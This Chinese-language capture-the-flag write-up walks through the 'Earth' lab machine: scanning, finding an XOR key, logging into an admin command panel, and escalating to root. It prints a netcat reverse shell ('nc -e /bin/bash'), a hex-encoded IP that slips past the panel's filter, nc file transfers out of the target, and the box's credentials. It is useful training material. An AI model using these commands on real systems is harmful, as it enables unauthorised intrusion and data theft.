外围信息收集
-
靶机描述
- Difficulty: Easy
- Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.
- 难度:简单
- 地球是一个简单的盒子,尽管你可能会发现它比“水星”在这个系列中更具有挑战性,并且根据你的经验更困难。盒子上有两个标志:用户和根标志,其中包括md5散列。这已经在VirtualBox上进行了测试,因此在VMware上可能无法正常工作。任何问题/问题或反馈,请给我发电子邮件:SirFlash at protonmail.com,虽然我可能需要一段时间才能回复你。
- 靶机界面
- 网卡信息
网卡模式 | VMnet8(NAT) |
MAC地址 | 00:0C:29:0F:1E:6A |
主动信息收集
- 主机扫描
sudo arp-scan -I eth0 192.168.16.0/24
目标靶机的地址是192.168.16.150
- 端口扫描
┌──(kali💋kali)-[~]
└─$ sudo nmap -A -p- -T4 192.168.16.150
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-19 19:00 CST
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 53.26% done; ETC: 19:02 (0:01:06 remaining)
Nmap scan report for bogon (192.168.16.150)
Host is up (0.00054s latency).
Not shown: 65405 filtered tcp ports (no-response), 127 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_ 256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
|_http-title: Bad Request (400)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
MAC Address: 00:0C:29:0F:1E:6A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6, Linux 5.0 - 5.4
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms bogon (192.168.16.150)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.65 seconds
有三个端口开启
22/tcp | open ssh OpenSSH 8.6 (protocol 2.0) |
80/tcp | open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1 |
443/tcp | open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1 |
- 网页信息
发现访问不到
在扫描里提示得改一下本地hosts文件
sudo vim /etc/hosts
加上一条 192.168.16.150 earth.local terratest.earth.local
保存退出
网页访问
渗透过程
看网页信息知
下面有三条之前发出去的密文,暂不知其解密方式
22端口开启,但是爆破不成功
- 目录扫描
扫描一下目录吧
dirb http://earth.local
dirb http://terratest.earth.local
dirb https://earth.local
dirb https://terratest.earth.local
访问一下admin,有一个登陆页面
在访问一下robots.txt,发现在其下有一个 /testingnotes.*不让爬取
由于没有给后缀名
尝试给一个txt,有一个页面
内容意思
测试安全消息传递系统注意事项:
*使用XOR加密算法,应该和RSA算法一样安全。
*地球已经确认他们收到了我们发送的信息。
*testdata.txt用于测试加密。
*terra用作管理门户的用户名。
待办事项:
*我们如何安全地将每月的密钥发送到地球?或者我们应该每周换一次钥匙?
*需要测试不同的密钥长度以防止暴力破解。钥匙应该有多长?
*需要改进消息界面和管理面板的界面,它目前是非常基本的。
这里有登陆的用户名 terra
testdata.txt是存放密钥的位置
访问一下testdata.txt
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
根据放射性测年法和其他证据,地球形成于45亿年前。在地球历史的最初10亿年里,生命出现在海洋中,并开始影响地球的大气和表面,导致厌氧生物和后来的好氧生物的增殖。一些地质证据表明,生命可能早在41亿年前就出现了。
- 解密
earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat
解密出的明文,仔细观察,发现是一串字符在重复
拿这个当密码去试
- 登录
用户名:terra
密码:earthclimatechangebad4humans
成功登陆,进入到命令执行界面
查询一下是谁,whoami
apache
因为我们是以web的方式执行命令
命令上下文不能联系
所以要做一个shell反弹、
- shell反弹
kali监听
nc -lnvp 1234
网页输入
nc -e /bin/bash 192.168.16.145 1234
发现不让进行远程连接,我们给IP进行一个加密转换(16进制)
nc -e /bin/bash 0xC0.0xA8.0x10.0x91 1234
执行后,kali这里收到了反弹
进入伪终端
伪终端能让我们执行命令更加流畅
python -c 'import pty;pty.spawn("/bin/bash")'
-
提权
find / -perm -u=s -type f 2>/dev/null
查找本地具有suid的命令
见名知,这是一个重置root密码的命令
执行一下,发现报错
把reset_root传回kali测试
用strace解析
开启kali监听端口,准备接受文件
nc -nlvp 4444 >reset_root
靶机输入
nc 192.168.16.145 4444 < /usr/bin/reset_root
已经到kali目录下
给他赋予所有权限
解析
strace /home/kali/reset_root
┌──(kali💋kali)-[~]
└─$ strace /home/kali/reset_root
execve("/home/kali/reset_root", ["/home/kali/reset_root"], 0x7ffecb371020 /* 61 vars */) = 0
brk(NULL) = 0x14e2000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fc49d728000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=86974, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 86974, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fc49d712000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0Ps\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1922136, ...}, AT_EMPTY_PATH) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1970000, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fc49d531000
mmap(0x7fc49d557000, 1396736, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7fc49d557000
mmap(0x7fc49d6ac000, 339968, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x17b000) = 0x7fc49d6ac000
mmap(0x7fc49d6ff000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ce000) = 0x7fc49d6ff000
mmap(0x7fc49d705000, 53072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fc49d705000
close(3) = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fc49d52e000
arch_prctl(ARCH_SET_FS, 0x7fc49d52e740) = 0
set_tid_address(0x7fc49d52ea10) = 4494
set_robust_list(0x7fc49d52ea20, 24) = 0
rseq(0x7fc49d52f060, 0x20, 0, 0x53053053) = 0
mprotect(0x7fc49d6ff000, 16384, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ) = 0
mprotect(0x7fc49d75a000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7fc49d712000, 86974) = 0
newfstatat(1, "", {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0x3), ...}, AT_EMPTY_PATH) = 0
getrandom("\x35\xcf\x98\xb3\x22\xaa\xe5\xc8", 8, GRND_NONBLOCK) = 8
brk(NULL) = 0x14e2000
brk(0x1503000) = 0x1503000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0) = ?
+++ exited with 0 +++
发现缺少几个文件夹a
在对应的位置新建
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
全部执行后再来运行一下reset_root
发现root密码已经被改成Earth
su登录 已经获得root权限
cd到root目录下
看到flag
- flag
find -name "*flag*"
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]